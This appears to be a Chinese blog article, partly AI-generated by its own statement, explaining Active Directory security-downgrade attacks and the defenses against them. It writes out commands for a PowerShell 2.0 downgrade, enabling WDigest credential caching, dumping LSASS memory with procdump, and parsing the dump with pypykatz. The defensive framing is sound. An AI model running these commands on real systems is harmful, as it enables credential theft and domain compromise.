Active Directory安全降级攻击:利用旧协议漏洞突破安全防线

张开发
2026/4/7 11:39:20 15 分钟阅读

分享文章

Active Directory安全降级攻击:利用旧协议漏洞突破安全防线
Active Directory安全降级攻击利用旧协议漏洞突破安全防线【免费下载链接】Active-Directory-Exploitation-Cheat-SheetA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.项目地址: https://gitcode.com/gh_mirrors/act/Active-Directory-Exploitation-Cheat-SheetActive Directory安全降级攻击是黑客常用的突破手段通过利用旧协议漏洞或系统配置缺陷将高安全性环境降级为低安全状态从而绕过防护机制获取敏感信息或系统控制权。本文将全面解析这类攻击的原理、常见手段及防御策略帮助新手理解并防范此类威胁。一、安全降级攻击的核心原理安全降级攻击的本质是利用系统向下兼容性设计迫使目标系统使用安全性较低的旧协议或配置。攻击者通过精心构造的请求诱导目标放弃现代安全机制如Kerberos、AES加密转而使用易受攻击的旧协议如NTLMv1、LM哈希。![Active Directory安全权限检查](https://raw.gitcode.com/gh_mirrors/act/Active-Directory-Exploitation-Cheat-Sheet/raw/702daf94e384589cdc81fe62f1337b390ce06488/Z - Tool Box/RSAT/img/AD_Module.png?utm_sourcegitcode_repo_files)图1Active Directory权限检查界面展示了系统权限状态与安全配置的关系常见的降级攻击场景包括协议降级将Kerberos认证降级为NTLMv1加密降级迫使系统使用弱加密算法如RC4功能降级禁用安全增强功能如PowerShell约束语言模式二、实用攻击手段与工具2.1 PowerShell版本降级绕过Windows系统默认保留PowerShell旧版本兼容性攻击者可通过切换到PowerShell 2.0绕过3.0引入的约束语言模式# 检查旧版本是否激活 Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 # 执行降级 powershell.exe -version 2.0约束语言模式限制了脚本执行能力但PowerShell 2.0完全不受此限制这是最常见的安全降级手段之一。2.2 认证协议降级利用通过修改注册表或利用协议协商漏洞可强制系统使用NTLMv1认证# 启用WDigest凭证缓存降低安全性 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1配合工具如Mimikatz提取LSASS进程中的凭证# 转储LSASS进程内存 .\procdump.exe -accepteula -ma lsass lsass.dmp # 解析凭证 pypykatz lsa minidump lsass.dmp![LSASS凭证提取过程](https://raw.gitcode.com/gh_mirrors/act/Active-Directory-Exploitation-Cheat-Sheet/raw/702daf94e384589cdc81fe62f1337b390ce06488/Z - Tool Box/PEASS/winPEAS/winPEASexe/images/screen.png?utm_sourcegitcode_repo_files)图2使用winPEAS工具检测系统漏洞红色标记处显示LSASS进程保护状态2.3 访问控制列表操作利用ADACLScanner工具可检测并利用Active Directory中的权限配置缺陷.\ADACLSCAN.ps1 -Base DCcontoso,DCcom -Filter ((AdminCount1)) -Scope subtree -EffectiveRightsPrincipal User1 -output HTML -Show![ADACLScanner权限分析](https://raw.gitcode.com/gh_mirrors/act/Active-Directory-Exploitation-Cheat-Sheet/raw/702daf94e384589cdc81fe62f1337b390ce06488/Z - Tool Box/ADACLScanner/src/effectiverights.gif?utm_sourcegitcode_repo_files)图3ADACLScanner工具分析用户有效权限的操作界面三、防御策略与最佳实践3.1 协议与加密强化禁用NTLMv1和LM哈希通过组策略设置网络安全: LAN 管理器身份验证级别为仅发送NTLMv2响应强制Kerberos使用AES加密在域控制器上配置支持AES-128和AES-256加密类型启用LSA保护设置注册表项HKLM\SYSTEM\CurrentControlSet\Control\LSA\RunAsPPL为13.2 PowerShell安全配置卸载PowerShell 2.0Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root设置__PSLockdownPolicy环境变量为4ConstrainedLanguage模式启用AppLocker限制未签名脚本执行3.3 系统监控与响应部署EDR工具监控LSASS进程访问定期审计AD权限配置使用Z - Tool Box/ADACLScanner/ADACLScan.ps1监控异常注册表修改特别是WDigest和LSA相关项四、总结Active Directory安全降级攻击利用了系统兼容性设计中的安全隐患通过协议降级、功能削弱等手段突破防御。防御此类攻击需要从协议配置、权限管理、系统加固多方面入手同时加强监控与审计。建议定期使用Z - Tool Box/PEASS/winPEAS/winPEASexe等工具进行漏洞扫描及时发现并修复安全降级风险点。通过本文介绍的攻击原理和防御措施管理员可以有效提升Active Directory环境的安全性防范各类降级攻击带来的威胁。【免费下载链接】Active-Directory-Exploitation-Cheat-SheetA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.项目地址: https://gitcode.com/gh_mirrors/act/Active-Directory-Exploitation-Cheat-Sheet创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

更多文章